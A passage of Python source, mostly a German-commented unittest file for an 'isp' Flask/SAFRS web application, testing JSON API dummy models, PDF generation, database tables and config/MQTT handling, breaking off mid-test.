''' handle threading for messagetype '''
self.logger.debug('about to start channel {0}'.format(channel))
channel.basic_consume(partial(mycallback, q=m_queue), queue=queue,
no_ack=True)
mq_recv_thread = threading.Thread(target=channel.start_consuming)
mq_recv_thread.start()
return mq_recv_thread
|
test_isp.py
|
# -*- coding: utf-8 -*-
"""
Alle in isp befindlichen Klassen und Funktionen prüfen.
Alle Laufzeit Fehlermeldungen sind bei der Testausführung gewollt
Nach der Ausführung steht am Ende OK wenn alle Tests durchgefürt wurden.
Bei Fehlern in den Überprüfungen steht am Ende::
======================================================================
FAIL:
.......
FAILED (failures=x)
"""
import os
from os import path as osp
# Module auch von der Konsole erreichbar machen
ABSPATH = os.path.dirname( os.path.abspath( __file__) )
path = osp.join( ABSPATH , "..")
import sys
sys.path.insert(0, path)
import shutil
from shutil import copyfile
#print(sys.path)
import unittest
import json
import time
from datetime import datetime
import warnings
warnings.filterwarnings("ignore")
import pandas as pd
import io
import matplotlib.pyplot as plt
from skimage import io as img_io
from skimage.util import compare_images
import numpy as np
from flask import Response
import dotmap
import threading
from safrs import jsonapi_rpc
from isp.config import ispConfig, dict_merge
from isp.webapp import ispBaseWebApp
from isp.safrs import db, system, ispSAFRSModel, ispSAFRSDummy, iso2date, isoDateType, isoDateTimeType
from isp.mpdf import PdfGenerator
from isp.plot import plotClass, rcParams
from sqlalchemy import MetaData
import logging
logger = logging.getLogger()
# ordner test/files
files_path = os.path.join( ABSPATH, 'files')
if not os.path.exists( files_path ):
try:
os.makedirs( files_path )
except IOError as e:
print("Unable to create dir.", e)
# weasyprint logging
wp_log_file = os.path.join(files_path, 'weasyprint.log')
if os.path.exists( wp_log_file ):
os.remove( wp_log_file )
wp_logger = logging.getLogger('weasyprint')
wp_logger.addHandler( logging.FileHandler( wp_log_file ) )
wp_logger.setLevel( logging.CRITICAL ) # WARNING, CRITICAL
class dummy( ispSAFRSDummy ):
"""
description: Tests - Test von ispSAFRSDummy
---
"""
__tablename__ = "dummy"
_database_key = ""
config = None
metadata = MetaData()
@classmethod
def init(self, kwargs:dict={} ):
"""
Wird von den jsonapi_rpc funktionen aufgerufen
Parameters
----------
kwargs : dict, optional
DESCRIPTION. The default is {}.
Returns
-------
kwargs : TYPE
DESCRIPTION.
"""
return kwargs
@jsonapi_rpc( http_methods=['GET'] )
def api_list(cls, **kwargs):
"""
summary : alle Angaben
description: alle Angaben
parameters:
- name : _ispcp
type: OrderedMap
in : query
default : {}
description : zusätzliche parameter
----
{'data': [{
'attributes': { }
'id': '1',
'links': {'self': 'http://localhost/api/dbtests/1/'},
'type': 'dbtests'
}]
'included': [],
'jsonapi': {'version': '1.0'},
'links': {'self': 'http://localhost/api/dbtests/?page[offset]=0&page[limit]=250'},
'meta': {'count': 7, 'limit': 250, 'offset': 0},
'App-Error': [],
'App-Info': []
}
ist:
{'data': [{
'function': 'api_list',
'kwargs': {'_ispcp': {}}
}],
'included': [],
'jsonapi': {'version': '1.0'},
'meta': {'count': 0, 'limit': 250, 'offset': 0},
'App-Error': [],
'App-Info': [{'message': 'safrs', 'info': 'Funktion: __main__.dummy.api_list()'}, {'message': 'kwargs', 'info': {'_ispcp': {}}}]}
es fehlt:
links
"""
#print("dummy.api_list")
cls.appInfo("kwargs", kwargs )
_result = [ {
"attributes": { "function": "api_list", "kwargs" : kwargs },
"id":"12",
"links": {"self": "http://localhost/api/dummy/12/"}, # autom. erzeugen
"type": "dummy" # autom. erzeugen
} ]
return cls._int_json_response( { "data": _result } )
@jsonapi_rpc( http_methods=['GET'] )
def api_get(cls, **kwargs):
"""
summary : eine Angabe
description: eine Angabe
parameters:
- name : Id
in : path
type: integer
required : true
description : id - der Informationen
- name : _ispcp
type: OrderedMap
in : query
default : {}
description : zusätzliche parameter
----
{'data': {
'attributes': {},
'id': '7',
'links': {'self': 'http://localhost/api/dbtests/7/'},
'type': 'dbtests'
},
'included': [],
'jsonapi': {'version': '1.0'},
'links': {'self': 'http://localhost/api/dbtests/7/'},
'meta': {'count': 1, 'instance_meta': {}, 'limit': 250, 'offset': 0},
'App-Error': [],
'App-Info': []
}
"""
#print("dummy.api_get")
# log.warning("gqa.api_get: {} id:{}".format( json.dumps(kwargs), cls.object_id ) )
cls.appInfo("kwargs", kwargs )
# normalerweise kein Datansatz in der Datenbank
if kwargs[cls._s_object_id] == "gibtsnicht":
_result = cls._int_get_empty_record( {"attributes": {cls._s_object_id : kwargs[cls._s_object_id] } })
else:
_result = {
"attributes": {cls._s_object_id : kwargs[cls._s_object_id] },
"id": 12,
"links": {"self": "http://localhost/api/{}/{}/".format(cls.__name__, 12)}, # autom. erzeugen
"type": cls.__name__ # autom. erzeugen
}
return cls._int_json_response( { "data": _result } )
@classmethod
@jsonapi_rpc( http_methods=['GET'] )
def test( cls, **kwargs ):
"""
description: test von api Funktionen und Parametern
parameters:
- name : _ispcp
in : query
default : {}
description : zusätzliche parameter
type: object
- name : zahl
in : query
required : true
description : Eine Zahl
type: number
- name : bool
in : query
required : false
default : false
description : Eine boolean Wert
type: boolean
- name : text
in : query
required : false
default : typenlos
description : Eine typenloser Wert mit default
----
"""
#import sqlalchemy
cls.appInfo("kwargs", kwargs )
_result = kwargs
# verschiedene Rückgaben
if kwargs["zahl"] == 1:
# leere liste
result = []
elif kwargs["zahl"] == 2:
# liste mit einem Element
result = [ {"a":1, "b":2} ]
elif kwargs["zahl"] == 3:
# liste mit einem Element
result = cls._int_json_response( "kein result" )
elif kwargs["zahl"] == 4:
# interne prüfungen
cls._int_add_meta( info= "{\"is\":\"dict\"}" )
result = []
elif kwargs["zahl"] == 5:
cls._int_parse_args( )
result = []
elif kwargs["zahl"] == 6:
result = cls._int_query( [ { "A":1 }, { "B":2 } ] )
elif kwargs["zahl"] == 7:
result = cls._int_groupby_query( cls._s_query, { "A":1, "B":2 } )
elif kwargs["zahl"] == 8:
result = []
db = cls.access_cls( "nicht da" )
result.append( {"nicht da": ""} )
db = cls.access_cls( "BigInteger" )
result.append( {"sqlalchemy.BigInteger": ""} )
elif kwargs["zahl"] == 9:
result = [
{'test=None': iso2date(None) },
{'20180415=2018-04-15': iso2date('20180415', True) },
{'2018-04-15=2018-04-15': iso2date('2018-04-15', True) },
{'2018-04-15 14:36:25=2018-04-15': iso2date('2018-04-15 14:36:25', True) },
{'2018-04-15=18-04-15 00:00:00': iso2date('2018-04-15') },
{'2018-04-15 14:36:25=2018-04-15 14:36:25': iso2date('2018-04-15 14:36:25') },
{'20180415 14:36:25=2018-04-15 14:36:25': iso2date('20180415 14:36:25') },
{'20180415 14:36=2018-04-15 14:36:00': iso2date('20180415 14:36') },
{'201A0415 14:36:25=None': iso2date('201A0415 14:36:25') },
{'201A0415 14:36=None': iso2date('201A0415 14:36') },
{'201A0415=None': iso2date('201A0415') },
]
else:
# dict
result = cls._int_json_response( { "data": _result } )
return result
@classmethod
@jsonapi_rpc( http_methods=['GET'] )
def pdf( cls, **kwargs ):
'''
description: test von pdf Funktionen und Parametern
parameters:
- name : _ispcp
in : query
default : {}
description : zusätzliche Json parameter
type: object
- name : name
in : query
required : false
default : nofile
description : Name der PDF Datei bestimmt die Art der pdf Erzeugung
----
'''
cls.appInfo("kwargs", kwargs )
mimetype='text/html'
status = 200
# verschiedene Rückgaben
if kwargs["name"] == "nofile":
status = 400
result = "Keine PDF Datei ({}.pdf) gefunden".format( kwargs["name"] )
cls.appError( "dummy/pdf", result)
# Fehler in der leere liste
return Response(result, status=status, mimetype=mimetype)
pdfFile = "{}.pdf".format(kwargs["name"])
variables = {
"Klinik" : "MedPhyDO",
"Abteilung" : "App Skeleton",
"logo": "logo.png",
"Datenausgabe" : "16.03.2020",
"Titel" : "unittest",
"Betreff" : "PdfGenerator",
"Auswertung" : "mpdf Test auch mit langem Text",
"Erstelldatum": "",
"Erstellt_von": "",
"Geprüft_von": "",
"Gültig_ab": "",
"Freigegeben_von": "",
"tip": "mpdf test tip für die Erstellung eines Unittest mit verschiedenen Elementen und PDF Rückgabe ",
"Version" : "",
"path": osp.join( ABSPATH , "files", "pdf"),
}
# print(pdfFile)
# Inhalte vorbereiten
# Testdateien
test_resources = osp.join( ABSPATH , "resources" )
test_files = {
"alpha" : osp.join( test_resources, 'alphachannel.svg' ),
"python" : osp.join( test_resources, 'python.svg' ),
"text" : osp.join( test_resources, 'test_text.txt' ),
"markdown" : osp.join( test_resources, 'test_markdown.md' ),
"markdown1" : osp.join( test_resources, 'test_markdown1.md' ),
"markdown2" : osp.join( test_resources, 'test_markdown2.md' ),
"logo" : 'logo.png', # immer aus den normalen resources
}
# text
text = """
<h1>Lorem ipsum</h1>
Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.
<br>
<b>kleiner Blindtext</b>
Hallo. Ich bin ein kleiner Blindtext. Und zwar schon so lange ich denken kann. Es war nicht leicht zu verstehen, was es bedeutet, ein blinder Text zu sein: Man ergibt keinen Sinn. Wirklich keinen Sinn. Man wird zusammenhangslos eingeschoben und rumgedreht – und oftmals gar nicht erst gelesen.
Aber bin ich allein deshalb ein schlechterer Text als andere?
<br>
"""
# data
# pandas daten verwenden
data = {
"A" : { "A" : 1, "B": 1.5, "C": "test", "D":-0.2 },
"B" : { "A" : 2, "B": 2.6, "C": "", "D": 1.2 },
"C" : { "A" : 3, "B": 3.2, "C": "test", "D": 0.4 },
"D" : { "A" : 4, "B": 4.1, "C": "", "D": -0.6 }
}
data_frame = pd.DataFrame(data)
# zeilen und spalten tauschen, und nach C sortieren
data_frame = data_frame.transpose().sort_values(by="C", ascending=False)
# Für die tests Fontsize auf 10, sonst wird 20 verwendet
rcParams["font.size"] = 10
# rcParams["figure.figsize"] = (6.4, 4.8)
# plt defaults setzen
plt.rcParams.update( rcParams )
# plot mit Pandas anzeigen
data_frame.plot(kind='bar', title='Rating');
# layout opimieren
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
#plt.show()
image_data = io.BytesIO()
plt.savefig( image_data, format='png' )
#
# weasyprint
#
# erstmal nur mit config Angaben
pdf = PdfGenerator( config=ispConfig( mqttlevel=logging.WARNING ) )
# jetzt mit den anderen lädt config intern
pdf = PdfGenerator( filename=pdfFile, variables=variables )
from isp.mpdf import DEFAULT_TEMPLATES
# default templates erneut setzen um config änderungen für den test nicht zu verwenden
# styles bereitstellen
pdf.PAGE_STYLE = DEFAULT_TEMPLATES["PAGE_STYLE"]
pdf.OVERLAY_STYLE = DEFAULT_TEMPLATES["OVERLAY_STYLE"]
# html Gerüst bereitstellen
pdf.header_html = DEFAULT_TEMPLATES["header_html"]
pdf.footer_html = DEFAULT_TEMPLATES["footer_html"]
if kwargs["name"] == "test-1":
# leeres pdf erstellen
# nur update metadata für coverage prüfen
#pdf.updateMetadata( )
pass
elif kwargs["name"] == "test-2":
# einfachen Text darstellen
pdf.textFile( test_files["text"], { "width": 80 })
# testet die HTML Ausgabe
pdf.html( '<b>HTML Test</b>', attrs={ "font-size":"9px" } )
# Markdown darstellen
pdf.textFile( test_files["markdown"], { "width": 80 } )
elif kwargs["name"] == "test-2a":
# wie test 2 aber zuerst markdown und dann text
# Markdown darstellen
pdf.textFile( test_files["markdown"], { "width": 80 } )
# testet die HTML Ausgabe
pdf.html( '<b>HTML Test</b>', attrs={ "font-size":"9px" } )
# einfachen Text darstellen
pdf.textFile( test_files["text"], { "width": 80 })
elif kwargs["name"] == "test-3":
# Seiten erstellung
c1 = pdf.setContentName("Seite 1")
pdf.text( "Inhalt 1" )
# neuer Content / neue Seite
pdf.setContentName("Seite 2")
pdf.text( "Inhalt 2" )
pdf.newPage()
pdf.text( "Inhalt 3" )
pdf.newPage()
pdf.text( "<h2>Seite 4</h2>" )
pdf.text( "Inhalt 4" )
# zum schluß noch in Content 1 auf der ersten Seite etwas einfügen
pdf.setContentName(c1, False)
pdf.text( "Inhalt 5 auf Seite 1" )
elif kwargs["name"] == "test-4":
icon_data = [
{ "acceptance": "True (5)", "icon": pdf.resultIcon( acceptance=True, iconOnly=True ) },
{ "acceptance": "False (1)", "icon": pdf.resultIcon( acceptance=False, iconOnly=True ) },
{ "acceptance": "1", "icon": pdf.resultIcon( acceptance=1, iconOnly=True ) },
{ "acceptance": "2", "icon": pdf.resultIcon( acceptance=2, iconOnly=True ) },
{ "acceptance": "3", "icon": pdf.resultIcon( acceptance=3, iconOnly=True ) },
{ "acceptance": "4", "icon": pdf.resultIcon( acceptance=4, iconOnly=True ) },
{ "acceptance": "5", "icon": pdf.resultIcon( acceptance=5, iconOnly=True ) },
{ "acceptance": "falsch", "icon": pdf.resultIcon( acceptance="falsch", iconOnly=True ) },
]
icon_frame = pd.DataFrame( icon_data )
# Text darstellen
pdf.text( text, { "width": 80 }, attrs={"border":"1px solid #FF0000"})
# Text aus einer nicht vorhandenen Datei verwenden
pdf.textFile( "gibtsnicht.md", { "width": 80 } )
# Text aus einer vorhandenen Datei verwenden
pdf.textFile( test_files["text"], { "width": 40, "top": 130 }, attrs={"border":"1px solid #FF0000"} )
#
# Angegebenes Bild anzeigen (svg)
pdf.image( test_files["alpha"], { "width": 50, "top":125, "left":60 }, attrs={"border":"1px solid #FF0000"} )
# Bild aus resources (png)
pdf.image( test_files["logo"] , { "width": 30, "top":55, "left":95 }, attrs={"border":"1px solid #FF0000"} )
# Bild eines data_frame.plot autom. höhe nach Inhalt
img = '<div style="float:right;">'
img += pdf.image( image_data, { "width": 60 }, render=False)
img += "</div>"
pdf.html( img, { "width": 80, "top":80, "left":10 }, attrs={"border":"1px solid #FF0000"} )
# pandas dataframe als Tabelle
html = (
data_frame.round(2).style
.set_uuid( "test_pandas_" )
.set_table_attributes('class="alayout-fill-width"') \
.format( { 'A':'{0:.1f}', 'B':'{0:.1f}', 'D':'{0:.3f}'} )
.hide_index()
.highlight_max(subset=["D"], color='yellow', axis=0)
.render()
)
pdf.html( html, attrs={ "font-size":"9px", "margin-left": "10px" } )
# ohne Angaben (nicht passiert)
pdf.pandas()
# leeres dataframe (nicht passiert)
pdf.pandas( pd.DataFrame() )
# pandas sofort ohne id
pdf.pandas( data_frame,
area={ "width": 50, "top": 180 },
attrs={ "id": "test", "class":"unittest" }, # id des dataframe
fields=[
{ "field": "gibtsnicht" },
{ "field": "A", "label":"is A", "format":"{}", "style": [('text-align', 'center')] },
{ "field": "D", "format":"{0:.3f}", "style": [('text-align', 'right')] }
]
)
pdf.pandas( icon_frame,
area={ "width": 50, "top": 5, "right": 0 },
# attrs={ "id": "test", "class":"unittest" }, # id des dataframe
)
# pandas sofort mit id
pdf.pandas( data_frame,
area={ "width": 50, "top": 180, "left": 60 },
fields=[
{ "field": "B", "label":"is B" },
{ "field": "D" }
]
)
# pandas ohne passende fields
pdf.pandas( data_frame,
area={ "width": 50, "top": 180, "left": 120 },
fields=[
{ "field": "gibtsnicht" },
]
)
pdf.resultIcon( 1 )
# neuer contentName (erzeugt seitenumbruch)
pdf.setContentName("Seite 3")
# Text aus einer vorhandenen Datei verwenden
pdf.textFile( test_files["markdown2"], { "width": 160 } )
# leeren Text einfügen
pdf.text( )
# text intern einfügen
pdf.text( 12 )
# markdown intern einfügen
pdf.markdown( "* Markdown **List** Element" )
# seitenumbruch immer
pdf.newPage()
pdf.resultIcon( 5 )
# neue Seite
pdf.text( "Seite 3" )
# ohne Angaben (nicht passiert)
pdf.pandasPlot()
# mit Angaben in der Angegebenen größe plotten
pdf.pandasPlot( data_frame, area={ "width": 100, "top": 30, "left": 20 }, kind='line', rot=75 )
# Text und TeX Formel nach SVG mit mathtext
pdf.mathtext( r"$a/b$" )
# nur den htmlcode für eine neue Seite erzeugen
pdf.newPage( False )
# einfach ein icon zum prüfen der fonts
pdf.icon( "mdi-paperclip", "x4")
# Plot Funktionen über die plotClass
# plot anlegen
plot = plotClass( )
fig, ax = plot.initPlot( )
# limits legende und grid
ax.set_ylim( [-2.0, 2.0] )
ax.grid( )
ax.legend( )
# als bar plot ausgeben
data_frame.plot( ax=ax, kind='bar', rot=75)
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
# chart im PDF anzeigen
pdf.image( plot.getPlot(), area={ "width": 100, "top": 130, "left": 20 } )
# close all figures
plt.close('all')
# showPlot nur so für coverage durchführen
plot.showPlot()
if kwargs["name"] == "test-1":
#
# finish durchführen (coverage test)
#
# 1. nur pdf erzeugen
result = pdf.finish( )
pdf._variables["unittest"] = True
# 2. als unittest pdf und png erzeugen (wie render_pdf_and_png)
result = pdf.finish( )
else:
#
# pdf und png Datei erstellen
#
result = pdf.render_pdf_and_png( )
#
# pdf und png Datei erstellen
#
result = pdf.render_pdf_and_png( )
return cls._int_json_response( { "data": result } )
@classmethod
#@jsonapi_rpc( http_methods=['GET'] )
def norpc( cls, **kwargs ):
'''
'''
return ""
class dbtestsrel( ispSAFRSModel ):
"""
description: Tests - Test von ispSAFRSModel mit relationen
---
"""
__table_args__ = {'extend_existing': True}
__tablename__ = "dbtestsrel"
id = db.Column('id', db.Integer, primary_key=True, unique=True, autoincrement=True)
dbtests_id = db.Column( 'dbtests_id', db.Integer, db.ForeignKey("dbtests.id") )
rstring = db.Column('rstring', db.String, nullable=False) #
rdate = db.Column('rdate', db.Date, nullable=True) # YYYYMMDD
rinteger = db.Column('rinteger', db.Integer, nullable=True)
rdata = db.Column('rdata', db.JSON ) # .. todo::json type?
# relationen
dbtests = db.relationship("dbtests", back_populates="dbtestsrel", foreign_keys=[dbtests_id]) # one to many
class dbtests( ispSAFRSModel ):
"""
description: Tests - Test von ispSAFRSModel mit relationen
---
In der Datenbank wird immer komplett abgelegt
Specify 'extend_existing=True' to redefine options and columns on an existing Table object.
Numeric auch DECIMAL
precision=None,
scale=None,
decimal_return_scale=None,
asdecimal=True, - es wird ein formatierter string zurückgegeben (gerundet)
db.Float( precision=5, asdecimal=True, decimal_return_scale=4 )
"""
__table_args__ = {'extend_existing': True}
__tablename__ = "dbtests"
id = db.Column('id', db.Integer, primary_key=True, unique=True, autoincrement=True)
string = db.Column('string', db.String, nullable=False) #
date = db.Column('date', db.Date, nullable=True) # YYYYMMDD
isodatetime = db.Column('isodatetime', isoDateTimeType, nullable=True) # YYYY-MM-DD HH:mm:SS
isodate = db.Column('isodate', isoDateType, nullable=True) # YYYY-MM-DD
integer = db.Column('integer', db.Integer, nullable=True)
data = db.Column('data', db.JSON ) # .. todo::json type?
tags = db.Column('tags', db.String, nullable=True)
gruppe = db.Column('gruppe', db.String, nullable=True)
aktiv = db.Column('aktiv', db.Integer, nullable=False, default=True)
float = db.Column('float', db.Float( asdecimal=True ), nullable=False, default=0) # (5,True,4) gibt 0.3333 als str
decimal = db.Column('decimal', db.DECIMAL( 5, 2, 1, True ), nullable=False, default=0)
numeric = db.Column('numeric', db.Numeric( 5, 2, 3, False ), nullable=False, default=0 )
# relationen
dbtestsrel = db.relationship("dbtestsrel", back_populates="dbtests", foreign_keys=[dbtestsrel.dbtests_id], lazy="dynamic", cascade="delete") # one to many
def to_dict(self):
# bei der Angabe asdecimal=True kommt ein str zurück deshalb diesen wieder in float umwandeln
result = ispSAFRSModel.to_dict(self)
result["decimal"] = float( result["decimal"] )
#print( result )
return result
@classmethod
@jsonapi_rpc( http_methods=['GET'] )
def test( cls, **kwargs ):
"""
description : Zusätzliche Funkton
parameters:
- name : _ispcp
in : query
default : {}
description : zusätzliche parameter
type: object
- name : zahl
in : query
required : true
description : Eine Zahl
type: number
- name : bool
in : query
required : false
default : false
description : Eine boolean Wert
type: boolean
- name : text
in : query
required : false
default : typenlos
description : Eine typenloser Wert mit default
----
"""
#print( cls.object_id )
cls.appDialog("dbtests", { "content" : " test Dialog", "dimensions" : [ 500, 200] })
result = []
#_result = kwargs
if kwargs["zahl"] == 8:
# Datenbank Klasse bestimmen
db = cls.access_cls( "dbtests" )
else:
result = cls._int_get_empty_record( {"tags": "defaulttag"} )
cls.appInfo("kwargs", kwargs, status_code=205 )
return cls._int_json_response( { "data": result } )
def run( config:dict={} ):
''' Startet ispBaseWebApp mit zusätzlichen config Angaben
Parameters
----------
config : dict, optional
DESCRIPTION. The default is {}.
Returns
-------
webApp : ispBaseWebApp
Die gestartete WebApplication
'''
# Konfiguration öffnen
_config = ispConfig( config=config )
# _config.update( config )
#print( _config )
_apiConfig = {
"models": [ system, dummy, dbtests, dbtestsrel ],
}
_webconfig = {
# nur um update von webconfig zu testen
"name" : "test_isp",
}
# Webserver starten
webApp = ispBaseWebApp( _config, db, webconfig=_webconfig, apiconfig=_apiConfig )
return webApp
class testBase(unittest.TestCase):
'''
setUp(), tearDown(), and __init__() will be called once per test.
'''
@classmethod
def setUpClass(cls):
''' Wird beim initialisieren der Testklasse aufgerufen
- Api bereitstellen
- test Ergebnisse zum Vergleich laden
'''
# This attribute controls the maximum length of diffs output by assert methods that report diffs on failure.
# It defaults to 80*8 characters
cls.maxDiff = None
files_path = os.path.join( ABSPATH, 'files')
pdf_path = os.path.join( ABSPATH, 'files', 'pdf')
config_path = os.path.join( ABSPATH, '..', 'config')
if not os.path.exists( files_path ):
os.mkdir( files_path )
# alte Datenbank löschen: über Pfad Angaben falls in der config nicht die testdatei steht
db_file = os.path.join( files_path, "tests.db" )
if os.path.exists( db_file ):
os.remove( db_file )
# alle erzeugten pdf und den Pfad pdf löschen
if os.path.exists( pdf_path ):
shutil.rmtree( pdf_path )
swagger_file = os.path.join( files_path, "swagger_test.json" )
if not os.path.exists( swagger_file ):
with open(swagger_file, 'w') as fp:
obj = {
"info": {
"title": "swagger test"
}
}
json.dump(obj, fp, indent=2)
# webapp mit unitest config
cls.webapp = run( {
"loglevel" :{
"safrs" : logging.DEBUG
#"webapp" : logging.INFO,
},
"server" : {
"webserver" : {
"name" : "swagger_test",
"port" : 5001,
"TESTING": True,
"reloader" : False
},
"api": {
"DBADMIN": True,
"custom_swagger_config": os.path.join( files_path, "swagger_test.json" )
}
},
"templates":{
"PDF-HEADER": None
},
"database": {
"main": "tests",
"tests" : {
"connection": "sqlite:///{{BASE_DIR}}/tests/files/tests.db"
}
}
} )
cls.app = cls.webapp.app
#print("setUpClass", cls.webapp.config.get() )
# Grunddaten in die Datenbank laden
data = {
"dbtests" : [
{ "string": "eins", "integer": 1, "gruppe":"A", "tags":"A,K", "aktiv":True },
{ "string": "zwei", "integer": 2, "gruppe":"B", "tags":"B,M", "aktiv":False },
{ "string": "drei", "integer": 3, "gruppe":"C", "tags":"M,K", "aktiv":True },
{ "string": "vier", "integer": 4, "gruppe":"C", "aktiv":False },
{ "string": "fünf", "integer": 5, "gruppe":"B", "tags":"A,K", "aktiv":True }
],
"dbtestsrel" : [
{ "dbtests_id": "1", "rstring": "r_eins", "rinteger": 11 },
{ "dbtests_id": "2", "rstring": "r_zwei", "rinteger": 12 },
{ "dbtests_id": "3", "rstring": "r_drei", "rinteger": 13 },
{ "dbtests_id": "4", "rstring": "r_vier", "rinteger": 14 },
{ "dbtests_id": "5", "rstring": "r_fünf", "rinteger": 15 }
]
}
for d in data["dbtests"]:
response = cls.app.post( "api/dbtests/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data": {
"attributes": d,
"type":"dbtests"
}
}))
for d in data["dbtestsrel"]:
response = cls.app.post( "api/dbtestsrel/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data": {
"attributes": d,
"type":"dbtestsrel"
}
}))
@classmethod
def tearDownClass(cls):
"""
config unittest file löschen
"""
#os.remove( cls.unitest_file )
pass
def setUp(self):
''' wird vor jedem test aufgerufen
'''
pass
def tearDown(self):
''' wird nach jeden test aufgerufen
Returns
-------
None.
'''
#self.app.
# close the browser window
#self.driver.quit()
pass
class ispTest( testBase ):
def test_config_mqtt(self):
'''isp.config ispConfig mit MQTTHandler (isp.mqtt) prüfen immer mit neuen kernel für mqttInitLogging
'''
# zuerst ohne parameter aufrufen
config = ispConfig( )
# __repr__ testen soll nicht die Klasse sondern die config selbst (dotmap) geben
self.assertEqual(
repr(config)[:7], 'DotMap(' , "Fehler beim laden __repr__")
# Magic Methods prüfen
self.assertEqual(
config.__dict__["_loadErrors"], [], "Fehler beim laden von _loadErrors")
self.assertEqual(
config._loadErrors, [], "__getitem__ Fehler bei vorhandenen _loadErrors im Object")
self.assertEqual(
type(config.test), dotmap.DotMap, "__getitem__ Fehler bei nicht vorhandenen in der config")
# __getattr__ wird bei nicht vorhandenen aufgerufen
self.assertEqual(
config._test, None, "__getitem__ Fehler bei nicht vorhandenen im Object")
# __getitem__
self.assertEqual(
config["_loadErrors"], [], "__getitem__ Fehler")
# __getitem__
self.assertEqual(
type(config["versions"]), dotmap.DotMap, "__getitem__ mit dotmap Fehler")
# __getattr__ mit dotmap (config Values)
self.assertEqual(
type(config.versions), dotmap.DotMap, "__getattr__ mit dotmap Fehler")
# __setitem__
config["_version"] = '2.unittest' # __setitem__
self.assertEqual(
config.__dict__["_version"], '2.unittest', "__setitem__ Fehler")
# __setitem__ mit dotmap (config Values)
config["unittest"] = '3.unittest' # __setitem__
self.assertEqual(
config.unittest, '3.unittest', "__setitem__ mit dotmap Fehler")
# __setattr__
config._version = '3.unittest' # __setattr__
self.assertEqual(
config.__dict__["_version"], '3.unittest', "__setattr__ Fehler")
# Zugiffe auf die config selbst
#
# komplette config als dict
self.assertEqual(
type( config.get() ), dict, "komplette config als dict")
# config get mit default
self.assertEqual(
config.get("gibtsnicht", "defaultValue"), 'defaultValue', "config get mit default")
# dotmap set oberste ebene
config._config["unittest"] = '4.unittest'
self.assertEqual(
config.get("unittest") , '4.unittest', "dotmap get auf erster ebene")
# dotmap set/get auf einer ebene
config._config.A.unittest = '4A.unittest'
self.assertEqual(
config.get("A.unittest") , '4A.unittest', "dotmap get auf zweiter ebene")
config._config.A.B.unittest = '4AB.unittest'
self.assertEqual(
config.get( ["A", "B", "unittest"] ) , '4AB.unittest', "dotmap get auf dritter ebene")
# dotmap set oberste ebene
config.set("5unittest", '5-unittest')
# dotmap get
self.assertEqual(
config.get("5unittest"), '5-unittest', "dotmap set auf erster ebene anlegen")
# dotmap set oberste ebene überschreiben
config.set("5unittest", '5a-unittest')
# dotmap get
self.assertEqual(
config.get("5unittest"), '5a-unittest', "dotmap set auf erster ebene ändern")
# dotmap set zweite ebene
config.set("B5.unittest", '5B-unittest')
# dotmap get
self.assertEqual(
config.get("B5.unittest"), '5B-unittest', "dotmap set auf zweiter ebene")
# dotmap set zweite ebene als list
config.set(["C5","unittest"], '5C-unittest')
# dotmap get
self.assertEqual(
config.get(["C5","unittest"]), '5C-unittest', "dotmap set/get auf zweiter ebene als list")
# dotmap set zweite ebene neues Element
config.set("B5.unittestA", '5B-unittest')
self.assertEqual(
config.get("B5").toDict(), {'unittest': '5B-unittest', 'unittestA': '5B-unittest'}, "dotmap set zweite ebene neues Element")
# hilfsfunktion dict_merge testen
a = {"A":1}
b = {"B":2}
c = dict_merge(a, b)
self.assertEqual(
c, {'A': 1, 'B': 2}, "dict_merge auch neue keys")
c = dict_merge(a, b, False)
self.assertEqual(
c, {'A': 1}, "dict_merge nur vorhandene keys")
# test in config setzen update prüfen
#
localtime = time.strftime("%Y%m%d %H:%M:%S.%f", time.localtime(time.time()) )
config.test = {"a":1, "time": localtime }
# a verändern
config.update( {
"test": {"a":2}
})
self.assertEqual(
config.test, {"a":2, "time": localtime }, "Fehler bei config update")
# ohne mqtt findet default logging statt (konsole)
# .. todo:: Konsole logger funktionen noch überprüfen
logger = logging.getLogger( "MQTT" )
logger.debug('logger.debug')
logger.info("logger.info")
logger.warning("logger.warning")
logger.error("logger.error")
# mqtt logging prüfen
#
if config.get("server.mqtt.host", "") == "":
print( "(MQTT) keine Angaben in config vorhanden. MQTT wird nicht getestet!")
return;
# config mit anderem mqttLevel
config = ispConfig( mqttlevel=30 )
mqtt = config.mqttGetHandler()
self.assertIsNotNone(
mqtt, "kein MQTT handler vorhanden")
results = {}
mqtt_event = threading.Event()
mqttResult = None
def onMqtt( msg ):
global mqttResult
# in results die empfangenen ablegen
mqttResult = msg
results[ msg["topic"] ] = msg["payload"]
mqtt_event.set()
# funktion bei signal aufrufen
mqtt.signal.connect( onMqtt )
def publishThread( args ):
global mqttResult
mqttResult = None
mqtt_event.clear()
# Als Thread aufrufen, über mq.get() wird die Rückgabe von _retrieve abgerufen
thread = threading.Thread( target=mqtt.publish, args=( args,) )
thread.start()
# max 2 sekunden oder auf mqtt_event aus onMqtt warten
while not mqtt_event.wait( timeout=3 ):
mqtt_event.set()
return mqttResult
# die eigenen script infos
result = publishThread({
"topic": "cmnd/status"
} )
self.assertEqual(
result["topic"], "stat/status", "Fehler bei cmnd/status abfrage")
# python process vorhanden?
result = publishThread({
"topic": "cmnd/process",
"payload" : "python"
} )
#print("----------------------cmnd/process", result )
self.assertEqual(
result["topic"], "stat/process", "Fehler bei process abfrage")
# publish ohne topic - publish wird nicht aufgerufen
# hier wird in publishThread auf timeout gewartet
result = publishThread({
"payload": "publish ohne topic - publish wird nicht aufgerufen"
})
self.assertIsNone(
result, "Fehler bei process abfrage")
# publish ohne payload - publish wird mit leerem payload aufgerufen
result = publishThread({
"topic": "cmnd/test/leer"
})
self.assertEqual(
result["payload"], "", "Fehler bei leerem payload")
# payload mit object - publish wird mit leerem payload aufgerufen nur (str, bytearray, int, float) ist ok
result = publishThread({
"topic": "cmnd/test/object",
"payload": object()
})
self.assertEqual(
result["payload"], "", "Fehler bei object payload")
# payload als Text
result = publishThread({
"topic": "cmnd/test/string",
"payload": "payload als Text"
})
self.assertEqual(
result["payload"], "payload als Text", "Fehler bei text payload")
# payload als dict
result = publishThread({
"topic": "cmnd/test/dict",
